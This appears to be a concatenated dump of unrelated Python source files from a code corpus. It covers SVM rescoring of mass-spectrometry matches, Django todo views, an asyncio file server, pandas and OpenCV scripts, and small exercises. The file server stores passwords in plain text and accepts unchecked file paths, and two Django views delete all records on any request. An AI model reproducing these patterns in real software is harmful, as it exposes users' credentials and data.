label = -1 if row_is_decoy(row) else 1
sequence = "{0}.{1}#{2}.{3}".format(
row["Sequence Pre AA"].strip(),
row["Sequence"].strip(),
row["Modifications"].strip(),
row["Sequence Post AA"].strip(),
)
additional_matrix_info.append(
{
"psm_id": row["Spectrum Title"].strip(),
"label": label,
"scannr": row["Spectrum Title"].strip().split(".")[-2],
"peptide": sequence,
"proteins": self.parse_protein_ids(row["Protein ID"]),
}
)
if i % 1000 == 0:
score_val = float(row[self.col_for_sorting])
msg = (
"Generating feature matrix from input csv "
"(line ~{0}) with score {1} and FDR "
"{2}".format(i, score_val, psm_FDR)
)
print(msg, end="\r")
# All data points are collected in one big matrix, to make standardization possible
print("\nConverting feature matrix to NumPy array...")
X_raw = np.array(list_of_feature_lists, dtype=float)
print("Replacing empty/NaN values with the mean of each column...")
self.nan_replacer = Imputer()
self.nan_replacer.fit(X_raw)
X_raw = self.nan_replacer.transform(X_raw)
# Standardize input matrix to ease machine learning! Scaled data has zero mean and unit variance
print("Standardizing input matrix...")
self.scaler = SCALER.fit(X_raw)
self.X = self.scaler.transform(X_raw)
self.categories = np.array(categories)
print()
if self["dump_svm_matrix"]:
print("Dumping SVM matrix to", self["dump_svm_matrix"])
for i, matrix_row in enumerate(self.X):
matrix_row_info = additional_matrix_info[i]
self.dump_svm_matrix_row(
row=list(matrix_row),
psm_id=matrix_row_info["psm_id"],
label=matrix_row_info["label"],
scannr=matrix_row_info["scannr"],
peptide=matrix_row_info["peptide"],
proteins=matrix_row_info["proteins"],
)
print("Dumped SVM matrix to", self["dump_svm_matrix"])
return
    def init_svm_matrix_dump(self):
        """Write the header row of the PIN-style SVM matrix dump file."""
        from misc import FEATURE_NAMES
        colnames = ["PSMId", "label", "scannr"] + FEATURE_NAMES
        colnames += ["charge{0}".format(c) for c in self.observed_charges]
        for extra_field in sorted(self.used_extra_fields):
            colnames += [extra_field]
        colnames += ["peptide"]
        # One proteinId column per protein of the widest input line.
        for n_proteins in range(self.maximum_proteins_per_line):
            colnames.append("proteinId{0}".format(n_proteins + 1))
        self.matrix_csv_path = self["dump_svm_matrix"]
        print("Dumping raw SVM input matrix to", self.matrix_csv_path)
        with open(self.matrix_csv_path, "w") as f:
            f.write("\t".join(colnames) + "\n")
def dump_svm_matrix_row(
self,
row=None,
psm_id=None,
label=None,
scannr=None,
peptide=None,
proteins=None,
):
full_row = [psm_id, label, scannr] + row + [peptide] + list(proteins)
with open(self.matrix_csv_path, "a") as f:
row_str = "\t".join(str(x) for x in full_row) + "\n"
f.write(row_str)
    def get_psm_category(self, row):
        """
        Determines whether a PSM (csv row) should be used as a negative or
        positive training example.

        returns
              1 - high-scoring target (positive training example)
              0 - not-high-scoring target (not usable for training)
             -1 - decoy (negative training example)
        """
        category = 0  # unknown (mix of true positives and false positives)
        self.PSM_count += 1  # for FDR calculation
        sequence = unify_sequence(row["Sequence"])
        psm_FDR = calc_FDR(self.PSM_count, self.decoy_count)
        if row_is_decoy(row):
            self.decoy_count += 1
            if psm_FDR <= 0.25 and sequence not in self.shitty_decoy_seqs:
                category = -1  # decoy (false positive hits)
                self.counter["negative"] += 1
            else:
                # Beyond 25% FDR, decoys are randomly subsampled so the
                # negative set ends up roughly twice the positive set;
                # the sampling probability is fixed on first use.
                if not self.decoy_train_prob:
                    need_max = self.counter["positive"] * 2
                    have = self.counter["negative"]
                    still_there = self.counter["decoy"] - have
                    prob = need_max / still_there
                    if prob < 0.001:
                        prob = 0.001
                    self.decoy_train_prob = prob
                    print()
                    print(self.counter)
                    print("need max:", need_max)
                    print("have:", have)
                    print("still_there:", still_there)
                    print("probability:", self.decoy_train_prob)
                    print()
                if self.decoy_train_prob >= 1.0 or random() <= self.decoy_train_prob:
                    category = -1  # decoy (false positive hits)
                    self.counter["negative"] += 1
        else:  # row is target
            if psm_FDR <= self["fdr_cutoff"] and sequence not in self.shitty_decoy_seqs:
                category = 1  # high quality target (almost certainly true positives)
                self.counter["positive"] += 1
        if category == 0:
            self.counter["unknown"] += 1
        return (category, psm_FDR)
    def train(self, training_matrix, training_categories):
        """Fit an SVC on labeled PSM features and return the classifier.

        training_matrix holds scaled feature rows; training_categories
        holds the matching labels (1 = target, -1 = decoy).
        """
        counter = Counter(training_categories)
        msg = "Training {0} SVM on {1} target PSMs and {2} decoy PSMs" "...".format(
            self["kernel"], counter[1], counter[-1]
        )
        print(msg, end="\r")
        # specify the classification method (rbf and linear SVC seem to work best and are quite fast)
        classifier = svm.SVC(
            C=self["c"],
            kernel=self["kernel"],
            probability=False,  # we don't want to get probabilities later on -> faster
            cache_size=self["mb_ram"],  # available RAM in megabytes
            # decision_function_shape = 'ovr', # doesn't seem to matter
            # class_weight= 'balanced', # doesn't seem to matter
        )
        # train the SVC on our set of training data:
        classifier.fit(
            training_matrix,
            training_categories,
        )
        print(msg + " done!")
        return classifier
    def classify(self, classifier, psm_matrix):
        """Score every PSM row by its distance to the SVM hyperplane.

        Scores are stored in self.results keyed by the (scaled) feature
        tuple; duplicate feature rows are averaged (and warned about).
        """
        msg = "Classifying {0} PSMs...".format(len(psm_matrix))
        print(msg, end="\r")
        for i, row in enumerate(psm_matrix):
            # get the distance to the separating SVM hyperplane and use it as a score:
            svm_score = classifier.decision_function(np.array([row]))[0]
            features = tuple(row)
            if features not in self.results:
                self.results[features] = svm_score
            else:
                print(
                    "Warning! This combination of features already has a predicted probability! "
                    "Previous svm_score: {0:f} - Current svm_score: {1:f}"
                    "".format(self.results[tuple(row)], svm_score)
                )
                # take the mean value, no idea how to handle this better, but it never happened so far...
                self.results[features] = (self.results[features] + svm_score) / 2.0
        print(msg + " done!")
        return
    def add_scores_to_csv(self):
        """Copy the input CSV, appending the SVM score column to every row."""
        outfname = os.path.basename(self["output_csv"])
        print("Writing output csv {0} ...".format(outfname))
        msg = "Writing output csv {0} (line ~{1})..."
        with open(self["output_csv"], "w", newline="") as out_csv, open(
            self.csv_path, "r"
        ) as in_csv:
            reader = csv.DictReader(in_csv)
            writer = csv.DictWriter(out_csv, reader.fieldnames + [self._svm_score_name])
            writer.writeheader()
            for i, row in enumerate(reader):
                if i % 1000 == 0:
                    print(msg.format(outfname, i), end="\r")
                # Re-derive the feature vector exactly as during training
                # (NaN-impute + scale) so it matches the self.results key.
                features = self.nan_replacer.transform(
                    np.array([self.row_to_features(row)])
                )
                features_scaled = tuple(list(self.scaler.transform(features)[0]))
                SVMScore = self.results[features_scaled]
                row[self._svm_score_name] = SVMScore
                writer.writerow(row)
        print("\n")
        return
def __str__(self):
out_str = ["\n\tpyPercolator Options:"]
for option, value in self.items():
out_str.append("{0:·<25}{1}".format(option, value))
return "\n".join(out_str)
if __name__ == "__main__":
    s = SVMWrapper()
    print(s)  # print parameter/settings overview
    s.determine_csv_sorting()
    s.find_shitty_decoys()
    print("\nCounter:")
    print(s.counter)
    print()
    s.count_intra_set_features()
    s.collect_data()
    print(
        "Splitting data in half to avoid training and testing on the same features..."
    )
    # NOTE(review): StratifiedKFold(y, n_folds=...) is the legacy
    # sklearn.cross_validation API (removed in scikit-learn >= 0.20) —
    # confirm the pinned scikit-learn version before upgrading.
    skfold = StratifiedKFold(s.categories, n_folds=2, shuffle=True)
    # use one half to score the other half, and vice versa:
    for i, (train_index, test_index) in enumerate(skfold):
        current_half = "1st" if i == 0 else "2nd"
        other_half = "2nd" if i == 0 else "1st"
        print(
            "\nUsing high-scoring PSMs and decoys of the {0} half to train...".format(
                current_half
            )
        )
        # Category 0 rows (unlabelled targets) are excluded from training.
        mask = s.categories[train_index] != 0
        train_categories = s.categories[train_index][mask]
        train_features = s.X[train_index][mask]
        svm_classifier = s.train(
            training_matrix=train_features,
            training_categories=train_categories,
        )
        print(
            "Using the trained SVM to classify all PSMs of the {0} half".format(
                other_half
            )
        )
        s.classify(
            svm_classifier,
            s.X[test_index],
        )
        if s["kernel"].lower() == "linear":
            print()  # print SVM coefficients (only works for linear kernel)
            print(svm_classifier.coef_)
            print()
    print("\nCounter:")
    print(s.counter)
    print()
    s.add_scores_to_csv()
|
24,149 | d4908911b79a29efb56e81eb60c83130ed692376 | import httplib2
from django.shortcuts import render, redirect
from django.views.decorators.http import require_POST
from datetime import datetime, timezone
from django.core.mail import send_mail
from django.conf import settings
from .models import Todo
from .forms import TodoForm
def index(request):
    """Render the todo list page with a blank creation form.

    NOTE(review): this view mutates data on GET — every todo dated before
    today is flagged complete and saved. Confirm that is intended.
    """
    todo_list = Todo.objects.order_by('date')
    for todo in todo_list:
        if todo.date.date() < datetime.now().date():
            todo.complete = True
            todo.save()
    time = datetime.now()
    form = TodoForm()
    context = {'todo_list': todo_list, 'form': form, 'time': time}
    return render(request, 'todo/index.html', context)
@require_POST
def addTodo(request):
    """Create a todo from the POSTed form and send a notification email."""
    form = TodoForm(request.POST)
    # NOTE(review): debug print left in — consider removing for production.
    print(request.POST['text'], request.POST['date'])
    if form.is_valid():
        new_todo = Todo(text=request.POST['text'], date=form.cleaned_data['date'])
        new_todo.save()
        subject = "Time for ToDo's :)"
        message = ' Your ToDo has a new event added. Checkout ToDo app :)'
        email_from = settings.EMAIL_HOST_USER
        # NOTE(review): placeholder recipient — must be configured before use.
        recipient_list = ['ADD RECIPIENT EMAIL', ]
        # send_mail returns the number of messages successfully sent.
        result = send_mail(subject, message, email_from, recipient_list)
        print(result)
    # Invalid forms fall through silently; the index is re-rendered either way.
    return redirect('index')
def completeTodo(request, todo_id):
    """Mark the todo with primary key `todo_id` as complete.

    Raises Todo.DoesNotExist (500) for an unknown id — no 404 handling.
    """
    todo = Todo.objects.get(pk=todo_id)
    todo.complete = True
    todo.save()
    return redirect('index')
def deleteCompleted(request):
    """Delete every todo already flagged complete, then return to the index."""
    Todo.objects.filter(complete__exact=True).delete()
    return redirect('index')
def deleteAll(request):
    """Delete every todo unconditionally, then return to the index."""
    Todo.objects.all().delete()
    return redirect('index')
|
24,150 | fa517ec4039d011a4c5f19332b436c59b68eacc1 | class Solution:
# @param A : string
# @param B : list of strings
# @return a list of strings
def wordBreak(self, s, wordDict):
return findWords(0, len(s), s, wordDict, {})
def findWords(start, end, s, wordDict, cache):
    """Return all segmentations of s[start:end] into words from wordDict.

    Each result is a space-joined sentence; `cache` memoizes results per
    start index so shared suffixes are only solved once.
    """
    if start in cache:
        return cache[start]
    results = []
    cache[start] = results
    for split in range(start + 1, end + 1):
        prefix = s[start:split]
        if prefix in wordDict:
            if split == end:
                results.append(prefix)
            else:
                for tail in findWords(split, end, s, wordDict, cache):
                    results.append(prefix + ' ' + tail)
    return results
|
24,151 | 327990f259b7b16c8fb1b39cad0666809dc84646 | from wxpusher import pusher
pusher.send_msg("train task end") |
24,152 | 7e4c48d34695ffb0f0ce355edf725529a4835309 | s1 = "His name is {0}!".format("Arthur")
print(s1)
name = "Alice"
age = 10
s2 = "I am {1} and I am {0} years old.".format(age, name)
print(s2)
n1 = 4
n2 = 5
s3 = "2**10 = {0} and {1} * {2} = {3:f}".format(2**10, n1, n2, n1 * n2)
print(s3)
n1 = "Paris"
n2 = "Whitney"
n3 = "Hilton"
print("Pi to three decimal places is {0:.3f}".format(3.1415926))
print("123456789 123456789 123456789 123456789 123456789 123456789")
print("|||{0:<15}|||{1:^15}|||{2:>15}|||Born in {3}|||".format(n1,n2,n3,1981))
print("The decimal value {0} converts to hex value {0:x}".format(123456))
letter = """
Dear {0} {2}.
{0}, I have an interesting money-making proposition for you!
If you deposit $10 million into my bank account, I can
double your money ...
"""
print(letter.format("Paris", "Whitney", "Hilton"))
print(letter.format("Bill", "Henry", "Gates"))
#printing table with only tabs
print("i\ti**2\ti**3\ti**5\ti**10\ti**20")
for i in range(1, 11):
print(i, "\t", i**2, "\t", i**3, "\t", i**5, "\t", i**10, "\t", i**20)
#printing table with string formatting
layout = "{0:>4}{1:>6}{2:>6}{3:>8}{4:>13}{5:>24}"
print(layout.format("i", "i**2", "i**3", "i**5", "i**10", "i**20"))
for i in range(1, 11):
print(layout.format(i, i**2, i**3, i**5, i**10, i**20)) |
24,153 | eb7ef047db578ceb11bc236255bfec9ca9257a8a | import asyncio
from datetime import datetime
import os
import re
import signal
import time
signal.signal(signal.SIGINT, signal.SIG_DFL)
class Client:
    """Per-user file store rooted at <cwd>/<name>.

    Tracks a current working folder plus the state of the paginated
    read_file() interface (open file path and character offset).
    """
    def __init__(self, name):
        self.name = name
        self.current_folder = os.path.join(os.getcwd(), self.name)
        # read_file() pagination state: currently open file and read offset.
        self.r_file = ""
        self.char_counter = 0
        os.makedirs(self.current_folder, exist_ok=True)

    def make_dir(self, name):
        """Create sub-folder `name` and enter it; return a status message.

        BUG FIX: the guard was `len(name) < 0`, which is never true, so an
        empty name reached os.makedirs() and reported "File already exists".
        """
        if len(name) == 0:
            return "Name is empty"
        try:
            os.makedirs(os.path.join(self.current_folder, name))
            self.current_folder = os.path.join(self.current_folder, name)
        except FileExistsError:
            return "File already exists"
        return "Folder created successful"

    def list(self):
        """Return a tab-separated listing (name, size, ctime) of the cwd."""
        message = "List of " + self.current_folder + "\n\n"
        message += "name\tsize\tcreate date\n"
        for file in os.listdir(self.current_folder):
            path = os.path.join(self.current_folder, file)
            date_time = datetime.fromtimestamp(os.stat(path).st_ctime)
            message += "{}\t{}\t{}\n".format(file, os.stat(path).st_size, date_time.strftime("%m/%d/%Y, %H:%M:%S"))
        return message

    def write_file(self, name, input):
        """Append bytes `input` to file `name` (both bytes); empty input
        creates the file or truncates an existing one."""
        # TODO: check whether the file exists before writing
        if len(input) > 0:
            with open(os.path.join(self.current_folder, name.decode()), "a") as file:
                file.write(input.decode())
        else:
            # "w" mode with nothing written creates/truncates the file.
            # (The original re-checked len(input) > 0 here — dead code.)
            with open(os.path.join(self.current_folder, name.decode()), "w"):
                pass
        return "Operation 'write_file' is completed"

    def read_file(self, name=b""):
        """Return the next 100-character page of `name`.

        An empty `name` closes the currently open file; switching to a new
        file resets the offset; reading past the end reports "End of file"
        and rewinds.
        """
        file_name = name.decode()
        if len(file_name) == 0:
            file_name = os.path.basename(self.r_file)
            if file_name == "":
                # NOTE(review): message has an unfilled {} placeholder in the
                # original protocol; kept verbatim for client compatibility.
                return "File {} doesn't opened. You need open file for the first"
            self.r_file = ""
            self.char_counter = 0
            return "File {} is closed".format(file_name)
        file_path = os.path.join(self.current_folder, name.decode())
        if self.r_file != file_path:
            # Switching files restarts pagination from the beginning.
            self.r_file = file_path
            self.char_counter = 0
        if os.path.isfile(file_path):
            with open(file_path, "r") as f:
                data = f.read()
            self.char_counter += 100
            data = data[self.char_counter - 100:self.char_counter]
            if len(data) > 0:
                basename = os.path.basename(self.r_file)
                return "Data from {}:\n\n{}".format(basename, data)
            else:
                self.char_counter = 0
                return "End of file"
        else:
            return "File {} doesn't exists".format(name.decode())

    def change_folder(self, name):
        """Change the cwd to sub-folder `name` (bytes); b".." goes up but
        never above the user's root folder."""
        if name.decode() == "..":
            if self.current_folder == os.path.join(os.getcwd(), self.name):
                return "Out of current working directory"
            dirname, _ = os.path.split(self.current_folder)
            self.current_folder = dirname
        else:
            path = os.path.join(self.current_folder, name.decode())
            if os.path.exists(path) and os.path.isdir(path):
                self.current_folder = path
            else:
                return "{} does not point to a folder in the current working directory".format(name.decode())
        return "Operation 'change_folder' is completed"
# todo Надо сделать чтобы клиент вводил команды
async def register(reader, writer):
    """Prompt the peer for a username/password and append them to UserList.txt.

    NOTE(review): passwords are stored in plain text, and the Client(...)
    instance is created only for its side effect (making the user's folder).
    """
    writer.write("Input username! ".encode())
    data = await reader.read(1000)
    username = data.decode()
    writer.write("Input password! ".encode())
    data = await reader.read(1000)
    password = data.decode()
    user_check = False
    with open("UserList.txt", "r") as file:
        for line in file:
            if username in line.split(":"):
                user_check = True
                break
    if user_check:
        writer.write("User already exists!".encode())
    else:
        with open("UserList.txt", "a") as file:
            file.write("{username}:{password}\n".format(username=username, password=password))
        # Creating the Client makes the user's working directory on disk.
        Client(username)
        writer.write("User has been created!".encode())
async def replace(source_file_path, pattern, substring):
    """Rewrite the file, substituting every regex `pattern` match with `substring`."""
    with open(source_file_path, 'r') as handle:
        contents = handle.read()
    contents = re.sub(pattern, substring, contents)
    with open(source_file_path, 'w') as handle:
        handle.write(contents)
async def login(reader, writer):
    """Authenticate the peer against UserList.txt.

    Returns (status, username, password, message). On success the user's
    line is tagged ":Online" so a second concurrent login is rejected.
    """
    writer.write("Input username: ".encode())
    data = await reader.read(1000)
    username = data.decode()
    writer.write("Input password".encode())
    data = await reader.read(1000)
    password = data.decode()
    user_check = False
    with open("UserList.txt", "r") as file:
        for line in file:
            user_info = line.strip().split(":")
            if username in user_info and password in user_info:
                if "Online" not in user_info:
                    user_check = True
                    break
                else:
                    user_check = "Online"
    if user_check == "Online":
        return False, username, password, "User already online"
    if user_check:
        # Mark the user as online so other connections see the session.
        await replace("UserList.txt", f'{username}:{password}\n', f'{username}:{password}:Online\n')
        return True, username, password, ""
    else:
        print("ERROR")
        return False, username, password, "Incorrect username or password"
def commands(writer, client):
    """Send the command-menu banner, including the client's current folder."""
    display_data = """Welcome
How can I help you
create_folder <name> --> Create new folder <name>
write_file <name> <input> --> Write <input> into <name> or Create a new file <name>
read_file <name> --> Read data from the file <name> in the current working directory
list --> View list of folders and files
change_folder <name> --> Move the current working directory for the current user to the specified folder residing in the current folder
register <username> <password> --> Register a new user to the server using the <username> and <password> provided
login <username> <password> --> Log in the user conforming with <username> onto the server if the <password> provided matches the password used while registering
quit --> Logout
Please select the option
Select (Current working directory: {}): """.format(client.current_folder)
    writer.write(display_data.encode())
async def menu(reader, writer, status, username, password, message="Error"):
    """Per-connection command loop for an authenticated user.

    Reads whitespace-delimited commands and dispatches them to the Client
    instance until the peer quits or the connection drops; on exit the
    user's ":Online" marker is removed from UserList.txt.
    """
    if status:
        client = Client(username)
        commands(writer, client)
        while True:
            try:
                data = await reader.read(1000)
                if len(data) > 0:
                    choise = data.decode().strip().split(' ', 2)
                    if "quit" in choise[0]:
                        await replace("UserList.txt", f'{username}:{password}:Online\n', f'{username}:{password}\n')
                        break
                    elif "create_folder" in choise[0]:
                        name = choise[1]
                        # BUG FIX: make_dir() was called a second time just to
                        # echo its result, repeating the side effect and sending
                        # a spurious "File already exists" to the client.
                        writer.write("{}\nSelect (Current working directory: {}): ".format(
                            client.make_dir(name),
                            client.current_folder).encode())
                    elif "list" in choise[0]:
                        writer.write("{}\nSelect (Current working directory: {}): ".format(
                            client.list(),
                            client.current_folder).encode())
                    elif "write_file" in choise[0]:
                        writer.write("{}\nSelect (Current working directory: {}): ".format(
                            client.write_file(choise[1].encode(), choise[2].encode()),
                            client.current_folder).encode())
                    elif "change_folder" in choise[0]:
                        writer.write("{}\nSelect (Current working directory: {}): ".format(
                            client.change_folder(choise[1].encode()),
                            client.current_folder).encode())
                    elif "read_file" in choise[0]:
                        if len(choise) > 1:
                            writer.write("{}\nSelect (Current working directory: {}): ".format(
                                client.read_file(choise[1].encode()),
                                client.current_folder).encode())
                        else:
                            writer.write("{}\nSelect (Current working directory: {}): ".format(
                                client.read_file("".encode()),
                                client.current_folder).encode())
                    elif "register" in choise[0]:
                        # BUG FIX: register() is a coroutine; without `await`
                        # it was never executed.
                        await register(reader, writer)
                    elif "commands" in choise[0]:
                        commands(writer, client)
                    else:
                        writer.write("\nSelect (Current working directory: {}): ".format(
                            client.current_folder
                        ).encode())
                else:
                    writer.write("\nSelect (Current working directory: {}): ".format(
                        client.current_folder
                    ).encode())
            except OSError:
                # Connection dropped: clear the Online marker and stop serving.
                await replace("UserList.txt", f'{username}:{password}:Online\n', f'{username}:{password}\n')
                break
    else:
        writer.write(message.encode())
async def start(reader, writer):
    """Connection entry point: offer login or registration, then run the menu."""
    try:
        message = "Are you a registered user?\npress y to yes\tpress n to no\nEnter your choice::"
        writer.write(message.encode())
        data = await reader.read(1000)
        answer = data.decode()
        if answer == "y":
            status, username, password, message = await login(reader, writer)
            await menu(reader, writer, status, username, password, message)
        elif answer == "n":
            # New users register first, then immediately log in.
            await register(reader, writer)
            status, username, password, message = await login(reader, writer)
            await menu(reader, writer, status, username, password, message)
        else:
            message = "Invalid choice\nPlease restart client"
            writer.write(message.encode())
    except ConnectionResetError:
        # Peer vanished mid-handshake; nothing to clean up yet.
        pass
async def main():
    """Start the asyncio TCP server on localhost:8088 and serve forever."""
    server = await asyncio.start_server(
        start, '127.0.0.1', 8088)
    addr = server.sockets[0].getsockname()
    print(f'Serving on {addr} started')
    async with server:
        await server.serve_forever()
|
24,154 | cb2222d5ffc832a49184c33abb9d465d5726f27f | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# Load the movie spreadsheet (columns include '电影名称'/title and '演员'/actors).
df = pd.read_excel('C:\\vscode\py\python_pigeon_farm\py_panda\电影信息.xlsx')
#print(df)
# Represent the data as a list of (actor, movie-title) tuples, one per
# actor appearing in each movie's comma-separated actor column.
pairs=[]
for i in range(len(df)):
    actors=df.at[i,'演员'].split(',')
    for actor in actors:
        pair=(actor,df.at[i,'电影名称'])
        pairs.append(pair)
# Sort by the numeric suffix of the actor name (characters after index 2).
pairs=sorted(pairs,key=lambda item:int(item[0][2:]))
#print(pairs)
# Build a new table from the pairs and count movies per actor.
index=[item[0] for item in pairs]
data=[item[1] for item in pairs]
df1=pd.DataFrame({'演员':index,'电影名称':data})
result = df1.groupby('演员', as_index=False, sort=False).count()
result.columns=('演员','电影数')
result.to_excel('C:\\vscode\py\python_pigeon_farm\py_panda/演员统计表.xlsx')
#print(result)
# Plot the per-actor movie counts as a bar chart and save it alongside.
plt.figure(figsize=(5,5),dpi=100,facecolor='LightPink')
result.plot(x='演员',y='电影数',kind='bar')
plt.savefig('C:\\vscode\py\python_pigeon_farm\py_panda/演员统计表.png')
plt.show()
|
24,155 | e708d98bd88d5467e9611663139d9081c0f6374b | import databases
import sqlalchemy
from sqlalchemy.ext.declarative import DeclarativeMeta, declarative_base
from .config import settings
# Async database handle used by request handlers.
database = databases.Database(settings.SQLALCHEMY_DATABASE_URI)
# Synchronous engine; pool_pre_ping revalidates stale pooled connections.
engine = sqlalchemy.create_engine(settings.SQLALCHEMY_DATABASE_URI, pool_pre_ping=True)
# Declarative base class all ORM models inherit from.
Base: DeclarativeMeta = declarative_base()
|
24,156 | b8b8ebf0781ea8741a31f050037acac0a149047a | import math
import numpy as np
import cv2 as cv
# 1. Read TEST image.
img = cv.imread("image.jpg", cv.IMREAD_COLOR)
# 2. Initialize known information (hand-measured for this test image).
#    - Table (corner coordinates).
#    - Cue ball (location, radius).
#    - Cue (2 points on the cue, including the coordinates of the tip).
table = [(163, 117), (1710, 120), (1836, 888), (63, 939)]
cue_ball = (590, 490)
cue_ball_radius = 30
cue_start = (203, 193)  # Random point within cue
cue_tip = (533, 400)
balls = [
    (180, 160),
    (860, 373),
    (963, 593),
    (893, 693),
    (1213, 783),
    (1103, 643),
    (1256, 556),
    (1176, 243),
    (1523, 206),
    (1516, 253),
    (1586, 503),
    (1673, 716)
]
# 3. Get the warp matrix of the table angle and warp the image.
#    Three corners define an affine transform onto an axis-aligned rectangle.
dst_shape = (table[1][0], table[2][1]-table[1][1])
src_pt = np.float32(table[:3])
dst_pt = np.float32([(0,0), (dst_shape[0],0), dst_shape])
warp_matrix = cv.getAffineTransform(src_pt, dst_pt)
img = cv.warpAffine(img, warp_matrix, dst_shape)
# src_pt = np.float32(table)
# dst_pt = np.float32([(0,0), (dst_shape[0],0), dst_shape, (0, dst_shape[1])])
# warp_matrix = cv.getPerspectiveTransform(src_pt, dst_pt)
# img = cv.warpPerspective(img, warp_matrix, dst_shape)
# 4. Correct known coordinates with the warp matrix.
def transform_point(pt, matrix):
    """Apply an affine warp matrix to one (x, y) tuple or a list of them.

    Returns a tuple for a single point, or a list of tuples for a list —
    mirroring the input shape.
    """
    is_list = type(pt) is list
    if not is_list:
        pt = [[pt]]
    else:
        pt = [[p] for p in pt]
    array = np.array(pt)
    transformed = cv.transform(array, matrix)
    squeezed = np.squeeze(np.squeeze(transformed))
    if not is_list:
        return tuple(squeezed[:2])
    return [tuple(x[:2]) for x in squeezed]
# table = transform_point(table, warp_matrix)
# Table corners after warping are known exactly, so they are hard-coded.
table = [(0, 0), (1710, 0), (1710, 768), (0, 768)]
cue_ball = transform_point(cue_ball, warp_matrix)
cue_start = transform_point(cue_start, warp_matrix)
cue_tip = transform_point(cue_tip, warp_matrix)
balls = transform_point(balls, warp_matrix)
# Six pockets: the four corners plus the midpoints of the long rails.
pockets = table.copy()
x_center = int(img.shape[1] / 2)
pockets.append((x_center, 0))
pockets.append((x_center, img.shape[0]))
def update():
    """Redraw the cue, predicted ball trajectory (up to 5 bounces) and debug
    overlays, then display the frame and install the mouse callback that
    re-runs this function when the cue endpoints are moved."""
    global img, table, cue_tip, cue_start, cue_ball, cue_ball_radius
    hit_balls = []
    shown_image = img.copy()
    def points_to_angle(point1, point2):
        # Angle (radians) of the vector from point1 to point2.
        return math.atan2(point2[1] - point1[1], point2[0] - point1[0])
    # 5. Draw the trajectory
    # 5.1 Get the cue angle based on 2 known points.
    #     - To get the angle in Radian measure use the atan2(y1-y2, x1-x2) function.
    cue_angle = points_to_angle(cue_start, cue_tip)
    # 5.2 Check if the cue angle overlaps with the location of the cue ball.
    #     - Check if the distance of the cue ball to the line is not more than the radius of the cue ball.
    #     - Distance is using: abs(ax - by + c) / sqrt(aa + bb)
    #     - a = y2-y1
    #     - b = x2-x1
    #     - c = x2y1 + y2x1
    #     - x, y = point of cue ball center.
    #     - Extra check if the cue ball is not behind the cue tip.
    # http://www.pygame.org/wiki/IntersectingLineDetection
    def line_intersect(line1, line2):
        # Intersection point of two (infinite) lines, or None when parallel.
        def gradient(points):
            if points[0][0] == points[1][0]:
                return None
            return (points[0][1] - points[1][1]) / (points[0][0] - points[1][0])
        def y_intersect(p, m):
            return p[1] - (m * p[0])
        m1, m2 = gradient(line1), gradient(line2)
        if m1 == m2:
            return None
        elif m1 is not None and m2 is not None:
            b1 = y_intersect(line1[0], m1)
            b2 = y_intersect(line2[0], m2)
            x = (b2 - b1) / (m1 - m2)
            pt = x, (m1 * x) + b1
        elif m1 is None:
            b2 = y_intersect(line2[0], m2)
            pt = line2[0][0], (m2 * line1[0][0]) + b2
        else:
            b1 = y_intersect(line1[0], m1)
            pt = line2[0][0], (m1 * line2[0][0]) + b1
        return tuple(int(x) for x in pt)
    def line_circle_collision(pt1, pt2, center, circle_radius):
        # True when the pt1->pt2 line passes within circle_radius of center.
        global img
        # Point opposite of circle
        if (min(pt2[0], img.shape[1]) - pt1[0]) < 0 == (max(pt2[0], 0) - center[0] < 0) or (pt2[1] - pt1[1]) < 0 == (
                pt2[1] - center[1]) < 0:
            return False
        a = (pt2[1] - pt1[1])
        b = (pt2[0] - pt1[0])
        c = (pt2[0] * pt1[1]) - (pt2[1] * pt1[0])
        x, y = center
        dist = abs(a * x - b * y + c) / math.sqrt(a * a + b * b)
        if circle_radius >= dist:
            return True
        else:
            return False
    # https://stackoverflow.com/questions/29384494/the-intersection-between-a-trajectory-and-the-circles-in-the-same-area
    def line_circle_intersection(pt1, pt2, center, circle_radius):
        # Points where the segment pt1->pt2 crosses the circle boundary.
        x1, y1 = [int(x) for x in pt1]
        x2, y2 = [int(x) for x in pt2]
        xc, yc = [int(x) for x in center]
        r = circle_radius
        dx = x1 - x2
        dy = y1 - y2
        rx = xc - x1
        ry = yc - y1
        a = dx * dx + dy * dy
        b = dx * rx + dy * ry
        c = rx * rx + ry * ry - r * r
        # Now solve a*t^2 + 2*b*t + c = 0
        d = b * b - a * c
        if d < 0.:
            # no real intersection
            return
        s = math.sqrt(d)
        t1 = (- b - s) / a
        t2 = (- b + s) / a
        points = []
        if 0. <= t1 <= 1.:
            points.append(tuple([round((1 - t1) * x1 + t1 * x2), round((1 - t1) * y1 + t1 * y2)]))
        if 0. <= t2 <= 1.:
            points.append(tuple([round((1 - t2) * x1 + t2 * x2), round((1 - t2) * y1 + t2 * y2)]))
        return points
    def invert_angle(angle):
        # Rotate an angle by 180 degrees, normalized to [0, 2*pi).
        return (angle + math.pi) % (2 * math.pi)
    if line_circle_collision(cue_start, cue_tip, cue_ball, cue_ball_radius):
        # 5.3 Get the angle of the cue ball trajectory.
        trj_angle = cue_angle
        start_point = cue_ball
        collisions = 1
        while collisions <= 5:
            collisions += 1
            # 5.4 Use the angle, center and radius of the cue ball to calculate at which point the line starts.
            #     - The point is: x = (x1 + r + cos(radians)), y = (y1 + r + sin(radians))
            end_point = (int(start_point[0] + 2000 * np.cos(trj_angle)), int(start_point[1] + 2000 * np.sin(trj_angle)))
            # 5.5 Draw the trajectory.
            #     - When the edge of the image is released then continue on a new angle or stop after 5 collision.
            line = np.array([start_point, end_point])
            # Filter out balls that are possible to hit
            # NOTE(review): hit_balls stores ball tuples (appended below), so
            # the `i not in hit_balls` index test never excludes anything; the
            # `ball in hit_balls` check inside the loop does the real filtering.
            selected_balls = []
            for i in range(0, len(balls)):
                if i not in hit_balls:
                    selected_balls.append(balls[i])
            # Sort the balls based on distance
            def point_distance(pt1, pt2):
                return math.sqrt(math.pow(pt2[0]-pt1[0], 2)+math.pow(pt2[1]-pt1[1], 2))
            def point_by_angle(pt, angle, distance):
                x = pt[0] + (distance * math.cos(angle))
                y = pt[1] + (distance * math.sin(angle))
                return tuple([round(x), round(y)])
            selected_balls.sort(key=lambda ball: point_distance(start_point, ball))
            ball_hit = False
            for ball in selected_balls:
                if ball in hit_balls:
                    continue
                if line_circle_collision(start_point, end_point, ball, cue_ball_radius*2):
                    points = line_circle_intersection(start_point, end_point, ball, cue_ball_radius*2)
                    if len(points) <= 0 or start_point == points[0]:
                        continue
                    end_point = points[0]
